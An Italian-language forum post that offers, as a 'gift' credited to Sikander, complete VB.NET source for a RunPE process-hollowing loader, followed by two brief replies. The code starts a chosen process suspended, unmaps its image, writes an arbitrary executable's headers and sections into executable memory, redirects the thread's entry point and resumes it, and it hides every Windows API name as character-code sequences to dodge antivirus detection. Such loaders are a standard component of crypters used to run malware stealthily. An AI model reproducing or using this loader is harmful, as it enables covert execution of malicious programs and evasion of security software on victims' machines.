Codice:
Imports System.Runtime.InteropServices
Imports System.Text
Public Class IX
<DllImport("kernel32.dll", CharSet := CharSet.Auto, SetLastError := True)> _
Friend Shared Function LoadLibraryA(<[In], MarshalAs(UnmanagedType.LPStr)> lpFileName As String) As IntPtr
End Function
Private Declare Ansi Function GetProcAddress Lib "kernel32" (hModule As IntPtr, procName As String) As IntPtr
Private Delegate Function ESS(appName As String, commandLine As StringBuilder, procAttr As IntPtr, thrAttr As IntPtr, <MarshalAs(UnmanagedType.Bool)> inherit As Boolean, creation As Integer, _
env As IntPtr, curDir As String, sInfo As Byte(), pInfo As IntPtr()) As Boolean
Private Delegate Function EXT(hThr As IntPtr, ctxt As UInteger()) As Boolean
Private Delegate Function TEX(t As IntPtr, c As UInteger()) As Boolean
'all kernel32
Private Delegate Function ION(hProc As IntPtr, baseAddr As IntPtr) As UInteger
'ntdll
Private Delegate Function ORY(hProc As IntPtr, baseAddr As IntPtr, ByRef bufr As IntPtr, bufrSize As Integer, ByRef numRead As IntPtr) As Boolean
Private Delegate Function EAD(hThread As IntPtr) As UInteger
'kernel32.dll
Private Delegate Function CEX(hProc As IntPtr, addr As IntPtr, size As IntPtr, allocType As Integer, prot As Integer) As IntPtr
Private Delegate Function CTEX(hProcess As IntPtr, lpAddress As IntPtr, dwSize As IntPtr, flNewProtect As UInteger, ByRef lpflOldProtect As UInteger) As Boolean
Private Delegate Function MOR(hProcess As IntPtr, lpBaseAddress As IntPtr, lpBuffer As Byte(), nSize As UInteger, ByRef lpNumberOfBytesWritten As Integer) As Boolean
'kernel32.dll
Private Delegate Function OP(bytes As Byte(), surrogateProcess As String) As Boolean
Public Function CreateAPI(Of T)(name As String, method As String) As T
Return DirectCast(DirectCast(Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(name), method), GetType(T)), Object), T)
End Function
Public Shared Function AA(bytes As Byte(), surrogateProcess As String) As Boolean
Dim p As New IX()
Dim F1 As New OP(AddressOf p.R)
Dim Res As Boolean = F1(bytes, surrogateProcess)
Return Res
End Function
Public Function R(bytes As Byte(), surrogateProcess As String) As Boolean
Dim K32 As [String] = Convert.ToString(ChrW(107)) & ChrW(101) & ChrW(114) & ChrW(110) & ChrW(101) & ChrW(108) & ChrW(51) & ChrW(50)
Dim NTD As [String] = Convert.ToString(ChrW(110)) & ChrW(116) & ChrW(100) & ChrW(108) & ChrW(108)
Dim CP As ESS = CreateAPI(Of ESS)(K32, Convert.ToString(ChrW(67)) & ChrW(114) & ChrW(101) & ChrW(97) & ChrW(116) & ChrW(101) & ChrW(80) & ChrW(114) & ChrW(111) & ChrW(99) & ChrW(101) & ChrW(115) & ChrW(115) & ChrW(65))
Dim NUVS As ION = CreateAPI(Of ION)(NTD, Convert.ToString(ChrW(78)) & ChrW(116) & ChrW(85) & ChrW(110) & ChrW(109) & ChrW(97) & ChrW(112) & ChrW(86) & ChrW(105) & ChrW(101) & ChrW(119) & ChrW(79) & ChrW(102) & ChrW(83) & ChrW(101) & ChrW(99) & ChrW(116) & ChrW(105) & ChrW(111) & ChrW(110))
Dim GTC As EXT = CreateAPI(Of EXT)(K32, Convert.ToString(ChrW(71)) & ChrW(101) & ChrW(116) & ChrW(84) & ChrW(104) & ChrW(114) & ChrW(101) & ChrW(97) & ChrW(100) & ChrW(67) & ChrW(111) & ChrW(110) & ChrW(116) & ChrW(101) & ChrW(120) & ChrW(116))
Dim STC As TEX = CreateAPI(Of TEX)(K32, Convert.ToString(ChrW(83)) & ChrW(101) & ChrW(116) & ChrW(84) & ChrW(104) & ChrW(114) & ChrW(101) & ChrW(97) & ChrW(100) & ChrW(67) & ChrW(111) & ChrW(110) & ChrW(116) & ChrW(101) & ChrW(120) & ChrW(116))
Dim RPM As ORY = CreateAPI(Of ORY)(K32, Convert.ToString(ChrW(82)) & ChrW(101) & ChrW(97) & ChrW(100) & ChrW(80) & ChrW(114) & ChrW(111) & ChrW(99) & ChrW(101) & ChrW(115) & ChrW(115) & ChrW(77) & ChrW(101) & ChrW(109) & ChrW(111) & ChrW(114) & ChrW(121))
Dim RT As EAD = CreateAPI(Of EAD)(K32, Convert.ToString(ChrW(82)) & ChrW(101) & ChrW(115) & ChrW(117) & ChrW(109) & ChrW(101) & ChrW(84) & ChrW(104) & ChrW(114) & ChrW(101) & ChrW(97) & ChrW(100))
Dim VAE As CEX = CreateAPI(Of CEX)(K32, Convert.ToString(ChrW(86)) & ChrW(105) & ChrW(114) & ChrW(116) & ChrW(117) & ChrW(97) & ChrW(108) & ChrW(65) & ChrW(108) & ChrW(108) & ChrW(111) & ChrW(99) & ChrW(69) & ChrW(120))
Dim VPE As CTEX = CreateAPI(Of CTEX)(K32, Convert.ToString(ChrW(86)) & ChrW(105) & ChrW(114) & ChrW(116) & ChrW(117) & ChrW(97) & ChrW(108) & ChrW(80) & ChrW(114) & ChrW(111) & ChrW(116) & ChrW(101) & ChrW(99) & ChrW(116) & ChrW(69) & ChrW(120))
Dim WPM As MOR = CreateAPI(Of MOR)(K32, Convert.ToString(ChrW(87)) & ChrW(114) & ChrW(105) & ChrW(116) & ChrW(101) & ChrW(80) & ChrW(114) & ChrW(111) & ChrW(99) & ChrW(101) & ChrW(115) & ChrW(115) & ChrW(77) & ChrW(101) & ChrW(109) & ChrW(111) & ChrW(114) & ChrW(121))
Try
Dim procAttr As IntPtr = IntPtr.Zero
Dim processInfo As IntPtr() = New IntPtr(3) {}
Dim startupInfo As Byte() = New Byte(67) {}
Dim num2 As Integer = BitConverter.ToInt32(bytes, 60)
Dim num As Integer = BitConverter.ToInt16(bytes, num2 + 6)
Dim ptr4 As New IntPtr(BitConverter.ToInt32(bytes, num2 + &H54))
If CP(Nothing, New StringBuilder(surrogateProcess), procAttr, procAttr, False, 4, _
procAttr, Nothing, startupInfo, processInfo) Then
Dim ctxt As UInteger() = New UInteger(178) {}
ctxt(0) = &H10002
If GTC(processInfo(1), ctxt) Then
Dim baseAddr As New IntPtr(ctxt(&H29) + 8L)
Dim buffer__1 As IntPtr = IntPtr.Zero
Dim bufferSize As New IntPtr(4)
Dim numRead As IntPtr = IntPtr.Zero
If RPM(processInfo(0), baseAddr, buffer__1, CInt(bufferSize), numRead) AndAlso (NUVS(processInfo(0), buffer__1) = 0) Then
Dim addr As New IntPtr(BitConverter.ToInt32(bytes, num2 + &H34))
Dim size As New IntPtr(BitConverter.ToInt32(bytes, num2 + 80))
Dim lpBaseAddress As IntPtr = VAE(processInfo(0), addr, size, &H3000, &H40)
Dim lpNumberOfBytesWritten As Integer
WPM(processInfo(0), lpBaseAddress, bytes, CUInt(CInt(ptr4)), lpNumberOfBytesWritten)
Dim num5 As Integer = num - 1
For i As Integer = 0 To num5
Dim dst As Integer() = New Integer(9) {}
Buffer.BlockCopy(bytes, (num2 + &Hf8) + (i * 40), dst, 0, 40)
Dim buffer2 As Byte() = New Byte((dst(4) - 1)) {}
Buffer.BlockCopy(bytes, dst(5), buffer2, Convert.ToInt32(Nothing, 2), buffer2.Length)
size = New IntPtr(lpBaseAddress.ToInt32() + dst(3))
addr = New IntPtr(buffer2.Length)
WPM(processInfo(0), size, buffer2, CUInt(addr), lpNumberOfBytesWritten)
Next
size = New IntPtr(ctxt(&H29) + 8L)
addr = New IntPtr(4)
WPM(processInfo(0), size, BitConverter.GetBytes(lpBaseAddress.ToInt32()), CUInt(addr), lpNumberOfBytesWritten)
ctxt(&H2c) = CUInt(lpBaseAddress.ToInt32() + BitConverter.ToInt32(bytes, num2 + 40))
STC(processInfo(1), ctxt)
End If
End If
RT(processInfo(1))
End If
Catch
Return False
End Try
Return True
End Function
End ClassCrediti: Sikander
Soltanto un regalino,dato che fra 5 ore parto.
funziona allo stesso modo?
come trolli tu non trolla nessuno 